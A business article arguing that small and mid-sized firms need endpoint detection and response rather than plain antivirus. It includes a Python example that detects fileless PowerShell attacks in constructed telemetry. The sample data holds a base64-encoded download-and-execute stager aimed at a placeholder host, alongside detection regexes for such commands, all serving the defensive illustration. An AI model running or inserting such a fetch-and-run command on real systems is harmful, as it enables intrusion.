At the recent IT Nation Secure 2023 event, ConnectWise shared an interesting statistic from Accenture in their opening keynote: “Even though 43% of cyberattacks are aimed at small and mid-sized businesses (SMBs), only 14% of SMBs are prepared to defend their businesses from pervasive cyberthreats.”
It is not surprising in the modern, connected world that smaller companies are being targeted, as malicious actors now use artificial intelligence (AI) to discover vulnerabilities, modify malware and craft convincing phishing campaigns. While AI services such as ChatGPT can help to increase productivity, similar or even the same AI tools are being used by malicious actors to automate attacks. Just a few years ago, it was hard to imagine SMBs being a primary target for cybercriminals. Today, attacks have become so cheap and easy to launch that malware and ransomware campaigns against SMBs are the norm.
Drawbacks Of Standard Antivirus Protection
It is hard to imagine a business not using essential antivirus protection—especially now, when free built-in solutions like Windows Defender offer a reasonable level of protection against malware. However, traditional antiviruses can have significant limitations.
• Limited Detection Capabilities: Traditional antiviruses focus on finding malware already on a computer, matching files against a database of known threats (signatures) and supplementing that with some behavioral analysis. Modern attacks increasingly leave nothing for a signature to match: attackers mask their activity with fileless malware that runs only in memory, or abuse legitimate tools already present on the system, such as remote desktop access, to move through networks and endpoints and steal data.
• Reactive Protection: An antivirus acts when malware is already running on a machine. By then it may be too late; ideally the intrusion is discovered and stopped at an earlier stage, before the malware is ever deployed.
• Limited Capability For Investigations: After a cyberattack, it is important to establish how it happened so that similar attacks can be prevented. Traditional antiviruses report what the malware was but often do not retain the data needed to reconstruct how it reached the system and what it did before it was detected.
Understanding EDR
The solution that I have found best satisfies the needs of modern businesses is endpoint detection and response (EDR). EDR is an integrated cybersecurity technology designed to protect computers (endpoints) by continuously monitoring activity on them, alerting administrators to suspicious events, and offering automated or semi-automated remediation, from stopping a threat to recovering a system after an attack. An EDR solution lets IT professionals discover and remediate an attack, run an investigation in a matter of minutes, and prevent future attacks. EDR is frequently paired with a backup or disaster recovery solution to ensure business continuity in case of catastrophic events, since one of the remediation actions may be restoring the system to a previously healthy state.
EDR solutions include several benefits:
• Proactive Threat Hunting: EDR continuously records endpoint and network behavior and flags anomalies that may indicate a security threat. Because that telemetry is retained, analysts can also hunt for activity that never triggered an alert.
• Enhanced Visibility: EDR provides enhanced visibility into endpoints, offering insights into what’s happening on the device in real time.
• Automated Response: EDR solutions can automatically respond to detected threats, significantly reducing the response time and mitigating potential damage.
• Advanced Analytics: EDR systems leverage advanced analytics, including AI, to detect unusual patterns and behaviors that could indicate a threat.
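The gap between the signature matching described under "Limited Detection Capabilities" and the behavioral monitoring EDR adds is easier to see in code. The following Python is an added example, not code from the article or from any EDR product: it runs a hash-based "signature" check and a few behavioral rules over constructed process-creation records modeled loosely on Windows endpoint telemetry, and applies a per-host suppression list of the kind the article's "flexible filters" refer to. All hashes, host names, paths, scripts and rule names are made up for the illustration.

```python
"""Added example (not from the article): signature vs. behavioral detection over
constructed endpoint telemetry, plus analyst-tuned suppression of a noisy rule."""
import base64
import hashlib
import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str
    sha256: str  # hash of the image on disk; the launched binary, not the payload


@dataclass
class Alert:
    host: str
    image: str
    source: str  # "signature" or "behaviour"
    reasons: list = field(default_factory=list)


# "Signature database" of known-bad file hashes. Constructed value, not a real IoC.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"constructed-dropper-sample").hexdigest()}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common spellings.
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)
DOWNLOAD_EXEC = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression", re.I)


def _name(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decoded_command_line(cmd):
    """Recover the script hidden behind -EncodedCommand (UTF-16LE, base64); else cmd."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return cmd
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # bad base64 or odd byte count: not a real encoded command
        return cmd


def signature_hit(ev):
    """What a traditional antivirus sees: is the executed file a known-bad hash?"""
    return ev.sha256 in KNOWN_BAD_SHA256


def behaviour_hits(ev):
    """What an EDR sees: who launched what, and what the command line really does."""
    parent, image = _name(ev.parent_image), _name(ev.image)
    reasons = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append("office-app-spawned-script-host")
    if image in POWERSHELL and ENCODED_ARG.search(ev.command_line):
        reasons.append("powershell-encoded-command")
    if image in POWERSHELL and DOWNLOAD_EXEC.search(decoded_command_line(ev.command_line)):
        reasons.append("powershell-download-and-execute")
    return reasons


def triage(events, suppressions=frozenset()):
    """Run both detectors; drop (host, rule) pairs an analyst has tuned out."""
    alerts = []
    for ev in events:
        if signature_hit(ev):
            alerts.append(Alert(ev.host, _name(ev.image), "signature", ["known-bad-hash"]))
        reasons = [r for r in behaviour_hits(ev) if (ev.host, r) not in suppressions]
        if reasons:
            alerts.append(Alert(ev.host, _name(ev.image), "behaviour", reasons))
    return alerts


# --- Constructed sample telemetry -------------------------------------------
def _enc(script):
    return base64.b64encode(script.encode("utf-16le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS_HASH = hashlib.sha256(b"constructed-legit-powershell-binary").hexdigest()  # unmodified, trusted
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ADMIN_SCRIPT = r"Get-Service | Out-File C:\reports\svc.txt"

SAMPLE_EVENTS = [
    # 1. Benign: a user opens a document.
    ProcessEvent("ws-017", r"C:\Windows\explorer.exe", WORD, "WINWORD.EXE /n invoice.docx",
                 hashlib.sha256(b"constructed-winword").hexdigest()),
    # 2. Classic malware: a dropper whose hash is already in the signature database.
    ProcessEvent("ws-017", r"C:\Windows\explorer.exe", r"C:\Users\alice\Downloads\invoice_viewer.exe",
                 "invoice_viewer.exe", hashlib.sha256(b"constructed-dropper-sample").hexdigest()),
    # 3. Fileless: a macro launches the stock PowerShell with a hidden, encoded downloader.
    ProcessEvent("ws-017", WORD, PS, f"powershell.exe -nop -w hidden -enc {_enc(STAGER)}", PS_HASH),
    # 4. Legitimate admin automation on a management server, also using -EncodedCommand.
    ProcessEvent("mgmt01", r"C:\Windows\System32\services.exe", PS,
                 f"powershell.exe -EncodedCommand {_enc(ADMIN_SCRIPT)}", PS_HASH),
]
# Analyst tuning: encoded commands are normal on this one management host.
SUPPRESSIONS = frozenset({("mgmt01", "powershell-encoded-command")})

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS, SUPPRESSIONS):
        print(f"{a.host:8} {a.image:20} {a.source:10} {', '.join(a.reasons)}")
```

Run as a script, the signature check catches only event 2; event 3 executes an unmodified, trusted powershell.exe and writes nothing new to disk, so there is no hash to match, and it is the parent-child relationship and the decoded command line that expose it. Event 4 shows why the suppression list matters: the same encoded-command pattern is routine on the management host, and tuning it out there keeps the alert queue manageable without disabling the rule everywhere.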
EDR Challenges
The term EDR was coined by Gartner's Dr. Anton Chuvakin in 2013, and EDR solutions have been on the market for over a decade. Yet despite its maturity, EDR has not been widely adopted by SMBs, primarily due to high costs and a lack of security expertise. Managing an EDR solution can be daunting for an IT team: EDR collects and processes enormous numbers of events and generates a steady stream of alerts and notifications, which the team must attend to on top of its day-to-day work of managing IT infrastructure and handling user support tickets. Triaging those notifications and analyzing events therefore typically requires significant time from specially trained staff.
However, in recent years, EDR solutions have become more accessible to MSPs and easier to use, requiring less specialist knowledge. And as cyberattacks become more prevalent, I believe SMB leaders should consider employing EDR technology.
How SMBs And IT Teams Can Employ EDR Solutions
1. Allocate time for cybersecurity training. Continuous education for IT professionals is critical, as IT and cybersecurity knowledge becomes outdated quickly. Business owners and IT managers must therefore allocate time for the training and certification of IT professionals. Vendor certifications in EDR can be a good start.
2. Find an EDR solution that offers maximum automation. Critical criteria for an effective EDR include the ability to automate the processing of events and alerts, guidance for resolving issues, and flexible filters for alerts and actions, all of which reduce the human workload required.
3. Integrate and automate. Integrate the EDR with identity providers and the company's other security solutions, such as email security or firewalls. Minimize the number of separate tools to be managed so as to reduce the IT professional's workload.
4. Partner with a managed service provider (MSP) specializing in cybersecurity. In some cases, it may be more reliable and economical to use a company with the resources, expertise and experience of working with EDR solutions for SMBs. (Full disclosure: My company offers these services, as do others.) If you don't currently have the technical talent available, or your in-house team can't accommodate the additional workload, there are many service providers who can deliver this service.
In Conclusion
The landscape of EDR solutions has changed significantly in recent years. Advances in AI help to automate security analysis, filtering out benign events and surfacing only the most important information to IT administrators. Managing EDR solutions no longer requires much advanced training, and even smaller MSPs can offer these services to their customers. Overall, I believe that using EDR is not just a recommendation anymore—it is an essential requirement for survival in today's digital world.